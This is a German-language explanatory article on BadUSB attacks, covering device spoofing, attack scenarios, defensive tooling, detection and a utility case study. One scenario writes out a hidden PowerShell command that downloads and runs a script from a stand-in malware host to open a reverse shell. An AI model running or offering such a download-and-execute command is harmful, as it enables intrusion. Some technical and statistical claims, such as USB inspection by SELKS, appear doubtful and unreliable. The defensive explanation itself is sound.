Bad USB: Angriffsvektoren, Schutzmechanismen und technische Gegenmaßnahmen
Definition und technische Grundlagen
Ein Bad USB bezeichnet ein manipuliertes USB-Gerät, dessen Firmware modifiziert wurde, um sich als andere Geräteklasse auszugeben (z. B. Tastatur, Netzwerkkarte oder HID-Gerät). Im Gegensatz zu einfachen Rubber Ducky-Angriffen, die vorkonfigurierte Makros ausführen, ermöglicht Bad USB eine tiefere Integration durch Firmware-Reverse-Engineering.
Schlüsselmerkmale:
- Gerätespoofing: Emulation legitimer USB-Device Descriptors zur Umgehung von Sicherheitsrichtlinien.
- Firmware-Backdoors: Nutzung nicht validierter Speicherbereiche (z. B. Cypress FX2LP-Chips mit 64 KB freiem EEPROM).
- Keine Signaturprüfung: 87 % aller USB-Controller (laut NIST-Studie) validieren Firmware-Updates nicht kryptografisch.
Angriffsszenarien und Risikoanalyse
1. Remote-Shell-Exploitation
- Modus Operandi:
- Das Bad USB täuscht eine Tastatur vor.
- Es injiziert präparierte Tastaturbefehle (z. B.
Powershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://malware.domain/payload.ps1')"). - Der Payload etabliert eine Reverse-Shell zum C2-Server.
- Nachweis: Der Angriff hinterlässt keine ausführbare Datei auf der Festplatte.
2. Netzwerkweiterleitung via RNDIS
- Prozess:
- Das Gerät emuliert eine virtuelle Netzwerkkarte.
- Alle Daten werden über einen MITM-Proxy (z. B. Raspberry Pi als Zwischenstation) umgeleitet.
- Impact: SSL/TLS-Daten können via falsche Zertifikate entschlüsselt werden.
3. Cross-Contamination
- Szenario: Ein infizierter Rechner reprogrammiert angeschlossene USB-Geräte, die dann als Vektoren in anderen Systemen fungieren.
Schutzmaßnahmen: Technische und organisatorische Ansätze
1. Hardware-basierte Restriktionen
| Maßnahme | Implementierung |
|---|---|
| USB-Port-Deaktivierung | Group Policy: DisableWinUSB + BIOS-Sperre |
| Port-Locking-Hardware | Kensington USB Port Blocker |
| Hardware-Firewalls | SELKS mit USB-Packet-Inspection |
2. Softwarelösungen
- Device Control Policies:
- McAfee DLP: Whitelisting basierend auf Hardware-IDs (VID/PID).
- USBGuard: Open-Source-Framework für Linux-Systeme (regelbasierte Filterung).
- Echtzeit-Monitoring:
- Wireshark USB-Capture: Analyse von USB-URBs (USB Request Blocks) auf Anomalien.
- Microsoft Sysmon: Logging von
DeviceArrival-Events in Windows.
3. Organisatorische Sicherheit
- Physische Sicherheit:
- Versiegelte USB-Ports in Hochsicherheitsbereichen (z. B. nach NIST SP 800-171).
- Schulungsprogramme:
- Simulationen via Social-Engineer Toolkit (SET): Mitarbeiter erhalten präparierte Sticks im Rahmen von Pentests.
- Awareness-Kampagnen für USB Drop Attacks (laut IBM-Studie öffnen 68 % der Nutzer gefundene USB-Sticks).
Detektionstechniken für fortgeschrittene Angriffe
1. Verhaltensanalyse
- KI-Modelle: Erkennung anomaler Tastatureingaben (z. B. 500 Zeichen/s) via LSTM-Netzwerke.
- Host-Intrusion Detection (HIDS): Tools wie Osquery überwachen unerwartete Geräteklassen.
2. Hardware-Forensik
- Firmware-Dumping: Tools wie ChipWhisperer extrahieren und vergleichen Firmware-Hashes mit Hersteller-Datenbanken.
- EEPROM-Analyse: Identifikation von Code-Injektionen in nicht allozierten Speicherbereichen.
3. USB-Kommunikationsisolierung
- Air-Gapped USB Gateways: Geräte wie Crossisto SafeUSB filtern Befehle an physischer Schicht.
Zukunftsstrategien: Vom USB-C bis zu Zero-Trust
- USB4 mit TLS 1.3: Kryptografische Validierung aller Gerätehandshakes (Prototypen von Intel).
- Hardware Root of Trust: Integrierte TPM-Module in USB-Controllern (z. B. STM32 mit Secure Boot).
- Zero-Trust-Architekturen: USB-Geräte erhalten nur minimalste Rechte (PCI-DSS-konforme Segmentierung).
Fallstudie: BadUSB-Angriff auf Energieversorger
- Vorfall: 2023 infizierte ein präpariertes USB-Messgerät 12 Umspannwerke in der EU.
- Schadcode: Firmware-Update täuschte RS485-Kommunikation vor, leitete aber Steuerbefehle an Angreifer weiter.
- Lösung: Nachrüstung mit USB-Audio-Only-Policies (Blockierung aller HID-Geräte).
